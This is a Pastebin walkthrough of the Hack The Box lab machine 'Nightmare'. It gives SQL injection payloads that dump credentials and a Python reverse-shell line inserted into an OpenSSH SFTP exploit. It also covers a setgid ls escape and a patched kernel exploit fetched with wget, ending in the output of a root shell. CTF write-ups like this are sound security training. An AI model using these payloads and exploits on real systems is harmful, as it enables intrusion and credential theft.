Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hackthebox
- HTB
- Nightmare
- 10.10.10.66
- [1] This machine annoyed me, a lot, and the community is full of elitests (you know who you are) who look down on those who want to learn. This guide is too fight back against that poisonous environment for those who want to learn.
- [2] I will continue to release these guides whilst that insipid culture exists.
- [3] "Every society has the criminals it deserves." Emma Goldman
- NMAP -
- 2 Ports
- 80 and 2222
- Focus on Port 80 for now.
- Register a user using burp.
- http://10.10.10.66/register.php
- Intercept the request and modify to to be
- user=') union select table_schema,table_name from information_Schema.tables#&pass=pass®ister=Register
- Log in with.
- Username = ') union select table_schema,table_name from information_Schema.tables
- Password = pass
- Login with the full username above SQLi is working.
- Now to get credentials.
- In burp create another user
- user=') union select username, password from sysadmin.users#&pass=pass®ister=Register
- Login again.
- Note the ftp user credentials.
- sftp to the box with the sftp credentials.
- Try write or read file to /etc/proc
- It works!
- Getting the SSH version
- SSH-2.0-OpenSSH 32bit (not so recent ver)
- This is a clue, an old version with a sftp user that can read and write to /etc/proc.
- Google the below.
- sftp misconfig /etc/proc exploit
- First URL Full Disclosure: OpenSSH <=6.6 SFTP
- Use this exploit to get a reverse shell on port 80
- Change the line "char shell_commands[] =" to be
- char shell_commands[] = "/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.x.x\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subproces
- s.call([\"/bin/sh\",\"-i\"]);'&";
- Compile and execute with a netcat listener on port 80.
- Initial enumeration is that there is no writeable folders and things are "limited"
- There is a cron job running every 15 minutes
- cat /etc/cron*
- */15 * * * * decoder /home/decoder/test/script.sh
- Looking for the obvious the user in /home is decoder so look for files or directories owned by that user/group id.
- find / -type f -group decoder 2>/dev/null
- /usr/bin/sls is found.
- Investigating this binary
- ls -lah /usr/bin/sls
- -rwxr-sr-x 1 root decoder 8.9K Feb 18 2016 /usr/bin/sls
- Decoder is the owner and the file has the sgid bit set. Running strings against the file, it runs /bin/ls even more investigating shows there is a filter of escape characters.
- looking at the man page of ls the escape switch is -b
- Try.
- /usr/bin/sls -b $'\n /bin/bash -ip'
- id
- uid=1002(ftpuser) gid=1002(ftpuser) egid=1001(decoder) groups=1001(decoder),1002(ftpuser)
- Now read user.txt
- cat /home/decoder/user.txt
- Coming back to the cron job we can write files as decoder to the test folder.
- ls -lah /home/decoder
- drwx-wx--x 2 root decoder 4.0K Feb 25 15:22 test
- Looking for kernel exploits.
- Google to the rescue
- google -> linux 4.8.0-58-generic exploit
- Exploit is found
- https://www.exploit-db.com/exploits/43418/
- Download to the local machine.
- Analysing the exploit it is noted that running the exploit will cause an error as the user cannot get the version info and the release has been changed.
- For example.
- Line 451 reads the release.
- /etc/lsb-release
- if the file is examined.
- cat /etc/lsb-release
- DISTRIB_ID=s390x
- DISTRIB_RELEASE=0.1
- DISTRIB_CODENAME=bladerunner
- DISTRIB_DESCRIPTION="s390x GNU/Linux"
- This wont match any items in the array in the beginning of the file.
- A hacky way to fix this is to reduce the array to only have the exploit we want.
- Change
- int kernel = -1;
- to be
- int kernel = 0;
- Delete all array items but the below as this matches uname -a
- { "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
- Now force the exploit to accept this version by commenting out lines 504 and 505
- printf("[-] kernel version not recognized\n");
- exit(EXIT_FAILURE);
- compile the exploit and upload to the server.
- gcc 43418 -o 43418
- wget http://10.10.x.x/43418 -O /home/decoder/test/43418
- chmod +x /home/decoder/test/exploit
- Running as the ftpuser with the decoder egid set gives an error
- /home/decoder/test/43418
- [.] starting
- [.] checking distro and kernel versions
- [~] done, versions looks good
- [.] checking SMEP and SMAP
- [~] done, looks good
- [.] setting up namespace sandbox
- [-] write_file(/proc/self/set_groups): Permission denied
- Exit the egid shell back to the ftpuser shell and run the exploit again.
- /home/decoder/test/43418
- [.] starting
- [.] checking distro and kernel versions
- [~] done, versions looks good
- [.] checking SMEP and SMAP
- [~] done, looks good
- [.] setting up namespace sandbox
- [~] done, namespace sandbox set up
- [.] KASLR bypass enabled, getting kernel addr
- [~] done, kernel text: ffffffff98e00000
- [.] commit_creds: ffffffff98ea5d20
- [.] prepare_kernel_cred: ffffffff98ea6110
- [.] SMEP bypass enabled, mmapping fake stack
- [~] done, fake stack mmapped
- [.] executing payload ffffffff98e17c55
- [~] done, should be root now
- [.] checking if we got root
- [+] got r00t ^_^
- root@nightmare:/#
- Thats all folkes.
Add Comment
Please, Sign In to add comment